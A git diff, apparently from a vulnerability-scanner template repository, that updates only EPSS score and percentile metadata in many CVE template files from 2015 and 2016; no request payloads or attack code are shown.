da3b7a9567..c853622d9b 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2015-6920 cwe-id: CWE-79 epss-score: 0.0016 - epss-percentile: 0.52033 + epss-percentile: 0.52402 cpe: cpe:2.3:a:sourceafrica_project:sourceafrica:0.1.3:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index f3e6c625e2..04744f146d 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-7245 cwe-id: CWE-22 epss-score: 0.96881 - epss-percentile: 0.99575 + epss-percentile: 0.99594 cpe: cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml index 8aa056114e..b2bc5e29eb 100644 --- a/http/cves/2015/CVE-2015-7297.yaml +++ b/http/cves/2015/CVE-2015-7297.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-7297 cwe-id: CWE-89 epss-score: 0.97564 - epss-percentile: 0.99996 + epss-percentile: 0.99998 cpe: cpe:2.3:a:joomla:joomla\!:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index 7da41df920..4375e3f4a1 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-7377 cwe-id: CWE-79 epss-score: 0.00239 - epss-percentile: 0.61218 + epss-percentile: 0.61607 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index f38ade74c4..6093566a3f 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2015-7450 cwe-id: CWE-94 - epss-score: 0.9741 - epss-percentile: 0.99883 + epss-score: 0.9739 + epss-percentile: 0.99886 cpe: cpe:2.3:a:ibm:tivoli_common_reporting:2.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index 0252460cd3..4054950b40 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-7780 cwe-id: CWE-22 epss-score: 0.00151 - epss-percentile: 0.50657 + epss-percentile: 0.51035 cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index af59249a0d..e10ebe0be5 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2015-7823 cwe-id: NVD-CWE-Other epss-score: 0.00233 - epss-percentile: 0.60673 + epss-percentile: 0.61055 cpe: cpe:2.3:a:kentico:kentico_cms:8.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml index ed428ef892..a7f1e00eba 100644 --- a/http/cves/2015/CVE-2015-8349.yaml +++ b/http/cves/2015/CVE-2015-8349.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2015-8349 cwe-id: CWE-79 epss-score: 0.0013 - epss-percentile: 0.47144 + epss-percentile: 0.4746 cpe: cpe:2.3:a:gameconnect:sourcebans:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml index 158d15948f..fb366c7552 100644 --- a/http/cves/2015/CVE-2015-8399.yaml +++ b/http/cves/2015/CVE-2015-8399.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2015-8399 cwe-id: CWE-200 epss-score: 0.9647 - epss-percentile: 0.99388 + epss-percentile: 0.99426 cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index cce93f1e64..45797c5334 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-8813 cwe-id: CWE-918 epss-score: 0.00511 - epss-percentile: 0.73635 + epss-percentile: 0.73911 cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index 2d94216a6d..f85bd641db 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-9312 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36469 + epss-percentile: 0.36841 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-9323.yaml b/http/cves/2015/CVE-2015-9323.yaml index 2c504b159c..f6e84916de 100644 --- a/http/cves/2015/CVE-2015-9323.yaml +++ b/http/cves/2015/CVE-2015-9323.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2015-9323 cwe-id: CWE-89 - epss-score: 0.00784 - epss-percentile: 0.79207 + epss-score: 0.00779 + epss-percentile: 0.7937 cpe: cpe:2.3:a:duckdev:404_to_301:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-9414.yaml b/http/cves/2015/CVE-2015-9414.yaml index 1204101b5c..94c2b7167f 100644 --- a/http/cves/2015/CVE-2015-9414.yaml +++ b/http/cves/2015/CVE-2015-9414.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-9414 cwe-id: CWE-79 epss-score: 0.00111 - epss-percentile: 0.43615 + epss-percentile: 0.43995 cpe: cpe:2.3:a:wpsymposiumpro:wp-symposium:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-9480.yaml b/http/cves/2015/CVE-2015-9480.yaml index 648c45c099..e35cedef15 100644 --- a/http/cves/2015/CVE-2015-9480.yaml +++ b/http/cves/2015/CVE-2015-9480.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-9480 cwe-id: CWE-22 - epss-score: 0.25055 - epss-percentile: 0.9605 + epss-score: 0.29071 + epss-percentile: 0.96329 cpe: cpe:2.3:a:robot-cpa:robotcpa:5:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml index 4db32683c5..391a1cee33 100644 --- a/http/cves/2016/CVE-2016-0957.yaml +++ b/http/cves/2016/CVE-2016-0957.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2016-0957 epss-score: 0.06304 - epss-percentile: 0.927 + epss-percentile: 0.92797 cpe: cpe:2.3:a:adobe:dispatcher:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index 25c2ae22a3..8624201c3a 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000126 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45183 + epss-percentile: 0.45566 cpe: cpe:2.3:a:admin-font-editor_project:admin-font-editor:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index 0f1d757108..808b4009fd 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000127 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45183 + epss-percentile: 0.45566 cpe: cpe:2.3:a:ajax-random-post_project:ajax-random-post:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000128.yaml b/http/cves/2016/CVE-2016-1000128.yaml index 7d168420bb..bd40491c11 100644 --- a/http/cves/2016/CVE-2016-1000128.yaml +++ b/http/cves/2016/CVE-2016-1000128.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000128 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40571 + epss-percentile: 0.40879 cpe: cpe:2.3:a:anti-plagiarism_project:anti-plagiarism:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml index b6aae8a6bd..ec1bd9c4ac 100644 --- a/http/cves/2016/CVE-2016-1000129.yaml +++ b/http/cves/2016/CVE-2016-1000129.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000129 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45183 + epss-percentile: 0.45566 cpe: cpe:2.3:a:defa-online-image-protector_project:defa-online-image-protector:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml index 1cd7eca464..9e5bb5aeab 100644 --- a/http/cves/2016/CVE-2016-1000130.yaml +++ b/http/cves/2016/CVE-2016-1000130.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000130 cwe-id: CWE-79 epss-score: 0.00093 - epss-percentile: 0.38597 + epss-percentile: 0.3897 cpe: cpe:2.3:a:e-search_project:e-search:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index b55f7cb4a0..c62fc0a78c 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000131 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40571 + epss-percentile: 0.40879 cpe: cpe:2.3:a:e-search_project:esearch:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml index 4f0854fcf0..c742878250 100644 --- a/http/cves/2016/CVE-2016-1000132.yaml +++ b/http/cves/2016/CVE-2016-1000132.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000132 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.44589 + epss-percentile: 0.44978 cpe: cpe:2.3:a:cminds:tooltip_glossary:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index 0d81f509f8..563cd0c6c8 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000133 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49194 + epss-percentile: 0.49563 cpe: cpe:2.3:a:designsandcode:forget_about_shortcode_buttons:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml index 223cfb5ecb..0ce2bde01b 100644 --- a/http/cves/2016/CVE-2016-1000134.yaml +++ b/http/cves/2016/CVE-2016-1000134.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000134 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40571 + epss-percentile: 0.40879 cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml index 794f281be7..b695396333 100644 --- a/http/cves/2016/CVE-2016-1000135.yaml +++ b/http/cves/2016/CVE-2016-1000135.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000135 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40571 + epss-percentile: 0.40879 cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000136.yaml b/http/cves/2016/CVE-2016-1000136.yaml index 4371b84c8b..9026559f0c 100644 --- a/http/cves/2016/CVE-2016-1000136.yaml +++ b/http/cves/2016/CVE-2016-1000136.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000136 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45183 + epss-percentile: 0.45566 cpe: cpe:2.3:a:heat-trackr_project:heat-trackr:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index 2052c3967a..e8caac2e20 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000137 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40571 + epss-percentile: 0.40879 cpe: cpe:2.3:a:hero-maps-pro_project:hero-maps-pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index 1bfabfd267..0e2427d7d7 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-1000138 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45183 + epss-percentile: 0.45566 cpe: cpe:2.3:a:indexisto_project:indexisto:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000139.yaml b/http/cves/2016/CVE-2016-1000139.yaml index 3dde7297ce..a01f6064d1 100644 --- a/http/cves/2016/CVE-2016-1000139.yaml +++ b/http/cves/2016/CVE-2016-1000139.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-1000139 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.44589 + epss-percentile: 0.44978 cpe: cpe:2.3:a:infusionsoft_project:infusionsoft:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000140.yaml b/http/cves/2016/CVE-2016-1000140.yaml index dd66d576c2..1a7672a198 100644 --- a/http/cves/2016/CVE-2016-1000140.yaml +++ b/http/cves/2016/CVE-2016-1000140.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000140 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45183 + epss-percentile: 0.45566 cpe: cpe:2.3:a:new-year-firework_project:new-year-firework:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml index a402d0e709..9888711796 100644 --- a/http/cves/2016/CVE-2016-1000141.yaml +++ b/http/cves/2016/CVE-2016-1000141.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2016-1000141 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49194 + epss-percentile: 0.49563 cpe: cpe:2.3:a:page-layout-builder_project:page-layout-builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index 36eee6a756..e748741fdd 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-1000142 cwe-id: CWE-79 epss-score: 0.00103 - epss-percentile: 0.4117 + epss-percentile: 0.41478 cpe: cpe:2.3:a:parsi-font_project:parsi-font:4.2.5:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000143.yaml b/http/cves/2016/CVE-2016-1000143.yaml index 9be75074a0..bf839cd927 100644 --- a/http/cves/2016/CVE-2016-1000143.yaml +++ b/http/cves/2016/CVE-2016-1000143.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000143 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49194 + epss-percentile: 0.49563 cpe: cpe:2.3:a:photoxhibit_project:photoxhibit:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml index fcc8cf7c31..379df6077c 100644 --- a/http/cves/2016/CVE-2016-1000146.yaml +++ b/http/cves/2016/CVE-2016-1000146.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000146 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45183 + epss-percentile: 0.45566 cpe: cpe:2.3:a:pondol-formmail_project:pondol-formmail:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index 166a3e4193..d2d1f893c8 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-1000148 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45183 + epss-percentile: 0.45566 cpe: cpe:2.3:a:s3-video_project:s3-video:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index f7de15a6a0..f11396eab7 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000149 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45183 + epss-percentile: 0.45566 cpe: cpe:2.3:a:simpel-reserveren_project:simpel-reserveren:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000152.yaml b/http/cves/2016/CVE-2016-1000152.yaml index d08de79f4e..722bb0df18 100644 --- a/http/cves/2016/CVE-2016-1000152.yaml +++ b/http/cves/2016/CVE-2016-1000152.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000152 cwe-id: CWE-79 epss-score: 0.00249 - epss-percentile: 0.6202 + epss-percentile: 0.6244 cpe: cpe:2.3:a:tidio-form_project:tidio-form:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml index 558c2437af..f18af7755c 100644 --- a/http/cves/2016/CVE-2016-1000153.yaml +++ b/http/cves/2016/CVE-2016-1000153.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000153 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40571 + epss-percentile: 0.40879 cpe: cpe:2.3:a:tidio-gallery_project:tidio-gallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index 8b484e42f2..f4a030d593 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000154 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49194 + epss-percentile: 0.49563 cpe: cpe:2.3:a:browserweb:whizz:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index b88f8a5cb9..2ca202a31b 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000155 cwe-id: CWE-79 epss-score: 0.00103 - epss-percentile: 0.4117 + epss-percentile: 0.41478 cpe: cpe:2.3:a:wpsolr:wpsolr-search-engine:7.6:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml index 29df698550..19a188b9d8 100644 --- a/http/cves/2016/CVE-2016-10033.yaml +++ b/http/cves/2016/CVE-2016-10033.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-10033 cwe-id: CWE-77 epss-score: 0.97464 - epss-percentile: 0.99934 + epss-percentile: 0.99946 cpe: cpe:2.3:a:phpmailer_project:phpmailer:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml index 9ac460f158..7f5bf47992 100644 --- a/http/cves/2016/CVE-2016-10108.yaml +++ b/http/cves/2016/CVE-2016-10108.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-10108 cwe-id: CWE-77 epss-score: 0.84853 - epss-percentile: 0.98057 + epss-percentile: 0.98124 cpe: cpe:2.3:a:western_digital:mycloud_nas:2.11.142:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml index d4d4761c4b..8772d493e1 100644 --- a/http/cves/2016/CVE-2016-10134.yaml +++ b/http/cves/2016/CVE-2016-10134.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-10134 cwe-id: CWE-89 epss-score: 0.46819 - epss-percentile: 0.96962 + epss-percentile: 0.97039 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index 9b56e7bf00..2f4ff1a4b1 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-10367 cwe-id: CWE-22 epss-score: 0.01346 - epss-percentile: 0.84443 + epss-percentile: 0.84601 cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:* metadata: verified: true diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml index 473f513275..077bd23445 100644 --- a/http/cves/2016/CVE-2016-10368.yaml +++ b/http/cves/2016/CVE-2016-10368.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-10368 cwe-id: CWE-601 epss-score: 0.00179 - epss-percentile: 0.5437 + epss-percentile: 0.54805 cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10924.yaml b/http/cves/2016/CVE-2016-10924.yaml index 9669b0566a..86a10f6f3a 100644 --- a/http/cves/2016/CVE-2016-10924.yaml +++ b/http/cves/2016/CVE-2016-10924.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2016-10924 cwe-id: CWE-22 - epss-score: 0.01574 - epss-percentile: 0.85677 + epss-score: 0.01306 + epss-percentile: 0.84379 cpe: cpe:2.3:a:zedna_ebook_download_project:zedna_ebook_download:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10940.yaml b/http/cves/2016/CVE-2016-10940.yaml index cc540d57f6..5479a2b9b3 100644 --- a/http/cves/2016/CVE-2016-10940.yaml +++ b/http/cves/2016/CVE-2016-10940.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.2 cve-id: CVE-2016-10940 cwe-id: CWE-89 - epss-score: 0.00841 - epss-percentile: 0.79955 + epss-score: 0.00696 + epss-percentile: 0.77963 cpe: cpe:2.3:a:zm-gallery_project:zm-gallery:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml index 2f9c801804..5c14231da3 100644 --- a/http/cves/2016/CVE-2016-10956.yaml +++ b/http/cves/2016/CVE-2016-10956.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2016-10956 cwe-id: CWE-20 - epss-score: 0.02303 - epss-percentile: 0.88281 + epss-score: 0.01913 + epss-percentile: 0.87222 cpe: cpe:2.3:a:mail-masta_project:mail-masta:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-10960.yaml b/http/cves/2016/CVE-2016-10960.yaml index 23b3234f48..f53df8c22d 100644 --- a/http/cves/2016/CVE-2016-10960.yaml +++ b/http/cves/2016/CVE-2016-10960.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-10960 cwe-id: CWE-20 epss-score: 0.01127 - epss-percentile: 0.82845 + epss-percentile: 0.83037 cpe: cpe:2.3:a:joomlaserviceprovider:wsecure:*:*:*:*:lite:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml index ac9d4beafa..d6aeaff680 100644 --- a/http/cves/2016/CVE-2016-10973.yaml +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-10973 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54186 + epss-percentile: 0.54613 cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index 65a5c49c55..9f884f9408 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-10993 cwe-id: CWE-79 epss-score: 0.00245 - epss-percentile: 0.61781 + epss-percentile: 0.622 cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index 93233c93dc..04852de400 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-1555 cwe-id: CWE-77 epss-score: 0.97375 - epss-percentile: 0.99856 + epss-percentile: 0.99871 cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index b447395a95..cae0e4820f 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-2389 cwe-id: CWE-22 epss-score: 0.24589 - epss-percentile: 0.96019 + epss-percentile: 0.96078 cpe: cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml index 48a352841f..12c8277b89 100644 --- a/http/cves/2016/CVE-2016-3081.yaml +++ b/http/cves/2016/CVE-2016-3081.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-3081 cwe-id: CWE-77 epss-score: 0.97524 - epss-percentile: 0.99979 + epss-percentile: 0.99987 cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index 9aaa203602..550470bdb9 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-3088 cwe-id: CWE-20 epss-score: 0.83955 - epss-percentile: 0.98024 + epss-percentile: 0.98079 cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index d37aacfb59..57cbeb4197 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-3978 cwe-id: CWE-79 epss-score: 0.00217 - epss-percentile: 0.59005 + epss-percentile: 0.594 cpe: cpe:2.3:o:fortinet:fortios:5.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-4437.yaml b/http/cves/2016/CVE-2016-4437.yaml index 20f11e6cb2..65740d49eb 100644 --- a/http/cves/2016/CVE-2016-4437.yaml +++ b/http/cves/2016/CVE-2016-4437.yaml @@ -20,7 +20,7 